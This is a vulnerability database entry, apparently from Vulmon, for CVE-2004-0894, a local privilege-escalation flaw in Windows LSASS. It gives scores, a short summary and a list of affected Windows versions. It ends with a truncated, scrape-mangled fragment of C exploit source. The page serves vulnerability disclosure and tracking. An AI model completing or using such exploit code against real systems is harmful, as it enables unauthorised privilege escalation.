7.2
CVSSv2

CVE-2004-0894

Published: 10/01/2005 Updated: 30/04/2019
CVSS v2 Base Score: 7.2 | Impact Score: 10 | Exploitability Score: 3.9
VMScore: 725
Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

LSASS (Local Security Authority Subsystem Service) of Windows 2000 Server and Windows Server 2003 does not properly validate connection information, which allows local users to gain privileges via a specially-designed program.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

microsoft windows 2000

microsoft windows 2003 server enterprise_64-bit

microsoft windows 2003 server enterprise

microsoft windows 2003 server standard

microsoft windows 2003 server web

microsoft windows xp

microsoft windows 2003 server r2

microsoft windows 2003 server datacenter_64-bit

Exploits

/* Removed #include "stdafxh" / str0ke */ #include <stdioh> #include <windowsh> #define INFO_BUFFER_SIZE MAX_COMPUTERNAME_LENGTH + 1 #define PATH_SIZE INFO_BUFFER_SIZE + MAX_PATH + 4 typedef UINT (WINAPI* PFnMsiInstallProduct)(LPCSTR szPackagePath, LPCSTR szCommandLine); int main(int argc, char* argv[]) { HANDLE hToken,hThread; H ...